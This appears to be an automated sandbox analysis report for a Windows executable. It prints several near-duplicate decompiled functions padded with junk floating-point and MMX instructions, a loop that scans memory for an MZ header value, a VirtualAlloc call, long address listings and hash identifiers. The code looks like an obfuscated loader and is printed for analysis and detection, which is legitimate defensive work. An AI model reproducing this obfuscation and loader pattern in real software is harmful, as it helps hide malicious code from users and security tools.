				asm("psraw xmm0, xmm3");
				_t198 = _t197 + 1;
				asm("packuswb xmm3, xmm5");
				asm("fyl2x");
				asm("fclex");
				asm("psrlq xmm7, 0xf4");
				asm("clc");
				_t301 = _t300 - st3;
				asm("f2xm1");
				_t170 = _t167 - 1 + 1;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				asm("fclex");
				asm("wait");
				_t142 = 0x905a4d;
				_t221 = _t219 - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t222 = _t221 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t221 = _t222 + 1;
					_t69 = _t67 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t67 = _t69 - 1;
					asm("clc");
					_t143 = _t142 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t142 = _t143 + 1;
					_t282 =  *_t67 - _t142;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t282 != 0);
				_t171 = _t170 - 1;
				asm("fsin");
				asm("fclex");
				_t172 = _t171 + 1;
				_t71 = _t67 - 1 + 1;
				asm("fldz");
				_t302 = _t301 - st3;
				_t200 = _t198 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				_t202 = _t200 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t203 = _t202 - 1;
				_t204 = _t203 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L114;
				_push(es);
			}

0x004027f0
0x004027f0
0x004027f0
0x004027f0
0x004027f0
0x004027f0
0x004027f1
0x004027f3
0x004027f4
0x0040286e
0x00000000
0x004027f6
0x004027f6
0x00402870
0x00402870
0x00000000
0x004027f8
0x004027f8
0x00402872
0x00402872
0x00000000
0x004027fa
0x004027fa
0x00402874
0x00402874
0x00000000
0x004027fc
0x004027fc
0x00402876
0x00402876
0x00000000
0x004027fe
0x004027fe
0x00402878
0x00402878
0x00000000
0x00402800
0x00402800
0x0040287a
0x0040287a
0x00000000
0x00402802
0x00402802
0x0040287c
0x0040287c
0x00000000
0x00402804
0x00402804
0x0040287e
0x0040287e
0x00000000
0x00402806
0x00402806
0x00402880
0x00402880
0x00000000
0x00402808
0x00402808
0x00402882
0x00402882
0x00000000
0x0040280a
0x0040280a
0x00402884
0x00402884
0x00000000
0x0040280c
0x0040280c
0x00402886
0x00402886
0x00000000
0x0040280e
0x0040280e
0x00402888
0x00402888
0x00000000
0x00402810
0x00402810
0x0040288a
0x0040288a
0x00000000
0x00402812
0x00402812
0x0040288c
0x0040288c
0x00000000
0x00402814
0x00402814
0x0040288e
0x0040288f
0x00000000
0x00402816
0x00402816
0x00402890
0x00402890
0x00402891
0x00000000
0x00402818
0x00402818
0x00402892
0x00402892
0x00000000
0x0040281a
0x0040281a
0x00402894
0x0040281c
0x0040281c
0x00402896
0x00402896
0x00402896
0x00000000
0x0040281e
0x0040281e
0x00402898
0x00402898
0x00000000
0x00402820
0x00402820
0x0040289a
0x0040289a
0x00000000
0x00402822
0x00402822
0x0040289c
0x0040289c
0x00000000
0x00402824
0x00402824
0x0040289e
0x0040289e
0x00000000
0x00402826
0x00402826
0x004028a0
0x004028a0
0x00000000
0x00402828
0x00402828
0x004028a2
0x004028a2
0x00000000
0x0040282a
0x0040282a
0x004028a4
0x004028a4
0x00000000
0x0040282c
0x0040282c
0x004028a6
0x004028a6
0x00000000
0x0040282e
0x0040282e
0x004028a8
0x004028a8
0x00000000
0x00402830
0x00402830
0x004028aa
0x004028aa
0x00000000
0x00402832
0x00402832
0x004028ac
0x004028ac
0x00000000
0x00402834
0x00402834
0x004028ae
0x004028ae
0x004028b0
0x004028b2
0x004028b4
0x004028b6
0x004028b8
0x004028ba
0x004028bc
0x004028be
0x004028c0
0x004028c2
0x004028c4
0x004028c6
0x004028c8
0x004028ca
0x004028cc
0x004028ce
0x004028d0
0x004028d2
0x004028d4
0x004028d6
0x004028d8
0x004028da
0x004028dc
0x00402836
0x00402836
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x00000000
0x0040283b
0x00402834
0x00402832
0x00402830
0x0040282e
0x0040282c
0x0040282a
0x00402828
0x00402826
0x00402824
0x00402822
0x00402820
0x0040281e
0x0040281c
0x0040281a
0x00402818
0x00402816
0x00402814
0x00402812
0x00402810
0x0040280e
0x0040280c
0x0040280a
0x00402808
0x00402806
0x00402804
0x00402802
0x00402800
0x004027fe
0x004027fc
0x004027fa
0x004027f8
0x004027f6
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00000000
0x004027eb
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8d5dc507aabeebc1e8cb0757397c8512cfd1f197a29bab03d0d31b69f55936
Instruction ID: cd4bedd3b9fb6f1344490f74103f16339af68846839d83bca9f793797af449d9
Opcode Fuzzy Hash: fb8d5dc507aabeebc1e8cb0757397c8512cfd1f197a29bab03d0d31b69f55936
Instruction Fuzzy Hash: 3681995692EA6586D20E3920834C6715E48EF92343330EB7BC8A7750F166FE5E4B349E

Uniqueness

Uniqueness Score: -1.00%

Function 004027E4, Relevance: 1.6, APIs: 1, Instructions: 377
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E004027E4(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t104;
				void* _t124;
				void* _t126;
				void* _t127;
				void* _t138;
				void* _t139;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t277;
				signed long long _t295;
				void* _t296;
				void* _t297;

				_t295 = __fp0;
				_t215 = __esi;
				_t190 = __edi;
				_t163 = __edx;
				_t124 = __ecx;
				_t104 = __ebx;
				_t58 = __eax;
				while(1) {
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t127 = _t126 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t124 = _t127 - 1 + 1;
					_t193 = _t192 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t190 = _t193 + 1;
					if(_t124 != 0) {
						asm("fnop");
						_t164 = _t163 - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						_t163 = _t164 + 1;
						asm("wait");
						asm("fninit");
						_t295 = _t295 / st5;
						asm("pcmpgtd mm4, mm0");
						_t126 = _t124 - 1 + 1;
						_t191 = _t190 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						_t192 = _t191 + 1;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						asm("paddb mm0, mm0");
						asm("cld");
						_t104 = _t104 >> 0x3f;
						asm("aas");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					_t62 = __imp__#690;
					asm("clc");
					asm("fst st1");
					asm("fdivrp st3, st0");
					_t194 = _t190 - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					_t195 = _t194 + 1;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					_t296 = _t295 - st3;
					asm("f2xm1");
					_t166 = _t163 - 1 + 1;
					asm("fcomp st0, st3");
					asm("emms");
					asm("cld");
					asm("fclex");
					asm("wait");
					_t138 = 0x905a4d;
					_t217 = _t215 - 1 + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						_t218 = _t217 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t217 = _t218 + 1;
						_t64 = _t62 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t62 = _t64 - 1;
						asm("clc");
						_t139 = _t138 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						_t138 = _t139 + 1;
						_t277 =  *_t62 - _t138;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (_t277 != 0);
					_t167 = _t166 - 1;
					asm("fsin");
					asm("fclex");
					_t168 = _t167 + 1;
					_t66 = _t62 - 1 + 1;
					asm("fldz");
					_t297 = _t296 - st3;
					_t197 = _t195 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t199 = _t197 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t200 = _t199 - 1;
					_t201 = _t200 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L53;
					_push(es);
				}
			}

0x004027e4
0x004027e4
0x004027e4
0x004027e4
0x004027e4
0x004027e4
0x004027e4
0x004027e5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x00000000
0x004027a5
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf4b9bf4718af28a0a66dddb599f0e04aa136f231e1e5de7fdb7a8060984c74
Instruction ID: 3e46901b6531cf14f12e001cc440c069d9642c30ebcc8fcd02097d814caac79a
Opcode Fuzzy Hash: fdf4b9bf4718af28a0a66dddb599f0e04aa136f231e1e5de7fdb7a8060984c74
Instruction Fuzzy Hash: 1181BB5192EA09C5D2262930864C6725948EBD7343330EB7B94A7B69E176FE0E4B30CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402846, Relevance: 1.6, APIs: 1, Instructions: 376memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 37100047dd4aac1e85c818425041506cea524787ddba5e73dc593a4b6c9c34f2
Instruction ID: aa7fc6c01b9d2287bbc954e0c83b9bda45d4e5770202d4e4fddf2b5ab30bd1d4
Opcode Fuzzy Hash: 37100047dd4aac1e85c818425041506cea524787ddba5e73dc593a4b6c9c34f2
Instruction Fuzzy Hash: 5B71CE5192EA44CAD217293486486715A48FF97343330EBBF89A7B50F1667E0E8B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 004029F0, Relevance: 1.6, APIs: 1, Instructions: 369memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fbe44f31ca35b1c5a01dbe7133757c96b561aaf02ad88cc95aa274fa584cd5a3
Instruction ID: 692e6b5974ec70c4e9e0f41409e8367b4b76c83386061c12e5ef5ce87ec308bf
Opcode Fuzzy Hash: fbe44f31ca35b1c5a01dbe7133757c96b561aaf02ad88cc95aa274fa584cd5a3
Instruction Fuzzy Hash: DF61DE5192EA44CAD2172D3086486715A48FF97343330EBBF89A7760E2667E0E4B34CF

Uniqueness

Uniqueness Score: -1.00%

Function 00402A94, Relevance: 1.6, APIs: 1, Instructions: 365memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 55d7b0ef8d2c5280a42def9c8ee5de9a256bbc69cf33922852afdb067d66fd77
Instruction ID: 3bd02725321c603473f4b96947929f0d1e7f2a77fddf297a20103f33a0cdfae3
Opcode Fuzzy Hash: 55d7b0ef8d2c5280a42def9c8ee5de9a256bbc69cf33922852afdb067d66fd77
Instruction Fuzzy Hash: 7C61CE5192EB44DAD2072D2085486715A48FB97343731EBBB49A7760F2667E0F4B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 004027CC, Relevance: 1.6, APIs: 1, Instructions: 365
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E004027CC(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t104;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t138;
				void* _t139;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t275;
				signed long long _t293;
				void* _t294;
				void* _t295;

				_t293 = __fp0;
				_t215 = __esi;
				_t190 = __edi;
				_t163 = __edx;
				_t124 = __ecx;
				_t104 = __ebx;
				_t58 = __eax;
				while(1) {
					asm("aas");
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t125 = _t124 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t127 = _t125 - 1 + 1;
					_t191 = _t190 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t192 = _t191 + 1;
					if(_t127 != 0) {
						asm("fnop");
						_t164 = _t163 - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						_t163 = _t164 + 1;
						asm("wait");
						asm("fninit");
						_t293 = _t293 / st5;
						asm("pcmpgtd mm4, mm0");
						_t124 = _t127 - 1 + 1;
						_t193 = _t192 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						_t190 = _t193 + 1;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						asm("paddb mm0, mm0");
						asm("cld");
						_t104 = _t104 >> 0x3f;
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					_t62 = __imp__#690;
					asm("clc");
					asm("fst st1");
					asm("fdivrp st3, st0");
					_t194 = _t192 - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					_t195 = _t194 + 1;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					_t294 = _t293 - st3;
					asm("f2xm1");
					_t166 = _t163 - 1 + 1;
					asm("fcomp st0, st3");
					asm("emms");
					asm("cld");
					asm("fclex");
					asm("wait");
					_t138 = 0x905a4d;
					_t217 = _t215 - 1 + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						_t218 = _t217 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t217 = _t218 + 1;
						_t64 = _t62 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t62 = _t64 - 1;
						asm("clc");
						_t139 = _t138 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						_t138 = _t139 + 1;
						_t275 =  *_t62 - _t138;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (_t275 != 0);
					_t167 = _t166 - 1;
					asm("fsin");
					asm("fclex");
					_t168 = _t167 + 1;
					_t66 = _t62 - 1 + 1;
					asm("fldz");
					_t295 = _t294 - st3;
					_t197 = _t195 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t199 = _t197 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t200 = _t199 - 1;
					_t201 = _t200 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027cc
0x004027cc
0x004027cc
0x004027cc
0x004027cc
0x004027cc
0x004027cc
0x004027a5
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x00000000
0x004027a4
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47007f0839a232f9d9afe043333d92003ff3eb740dcef652d19af9d1540fa894
Instruction ID: ca656d6516db49d2d028ac356adf57a1b5a330091944ac5253183e3d30e44d54
Opcode Fuzzy Hash: 47007f0839a232f9d9afe043333d92003ff3eb740dcef652d19af9d1540fa894
Instruction Fuzzy Hash: A681AE5193EA44C6D217293486486715A48FF97343330EB7F89A7B60E166BE0E8B748F

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8, Relevance: 1.6, APIs: 1, Instructions: 365
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E004027B8(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t104;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t138;
				void* _t139;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t275;
				signed long long _t293;
				void* _t294;
				void* _t295;

				_t293 = __fp0;
				_t215 = __esi;
				_t190 = __edi;
				_t163 = __edx;
				_t124 = __ecx;
				_t104 = __ebx;
				_t58 = __eax;
				while(1) {
					asm("aas");
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t125 = _t124 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t127 = _t125 - 1 + 1;
					_t191 = _t190 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t192 = _t191 + 1;
					if(_t127 != 0) {
						asm("fnop");
						_t164 = _t163 - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						_t163 = _t164 + 1;
						asm("wait");
						asm("fninit");
						_t293 = _t293 / st5;
						asm("pcmpgtd mm4, mm0");
						_t124 = _t127 - 1 + 1;
						_t193 = _t192 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						_t190 = _t193 + 1;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						asm("paddb mm0, mm0");
						asm("cld");
						_t104 = _t104 >> 0x3f;
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					_t62 = __imp__#690;
					asm("clc");
					asm("fst st1");
					asm("fdivrp st3, st0");
					_t194 = _t192 - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					_t195 = _t194 + 1;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					_t294 = _t293 - st3;
					asm("f2xm1");
					_t166 = _t163 - 1 + 1;
					asm("fcomp st0, st3");
					asm("emms");
					asm("cld");
					asm("fclex");
					asm("wait");
					_t138 = 0x905a4d;
					_t217 = _t215 - 1 + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						_t218 = _t217 - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						_t217 = _t218 + 1;
						_t64 = _t62 - 1 + 1;
						asm("fldl2e");
						asm("fst st1");
						_t62 = _t64 - 1;
						asm("clc");
						_t139 = _t138 - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						_t138 = _t139 + 1;
						_t275 =  *_t62 - _t138;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (_t275 != 0);
					_t167 = _t166 - 1;
					asm("fsin");
					asm("fclex");
					_t168 = _t167 + 1;
					_t66 = _t62 - 1 + 1;
					asm("fldz");
					_t295 = _t294 - st3;
					_t197 = _t195 - 1 + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					_t199 = _t197 - 1 + 1;
					asm("fdecstp");
					asm("fprem1");
					_t200 = _t199 - 1;
					_t201 = _t200 + 1;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027b8
0x004027b8
0x004027b8
0x004027b8
0x004027b8
0x004027b8
0x004027b8
0x004027a5
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x00000000
0x004027a4
0x004028e7
0x004028e8
0x004028ea
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc25daa7d58a4900186798a9e3d8e16d6ec604d045925e37970ef8cf856410b
Instruction ID: 2e30e5750200207b2a810d2239226a447011b39fedb26208ff644dcc8638a25f
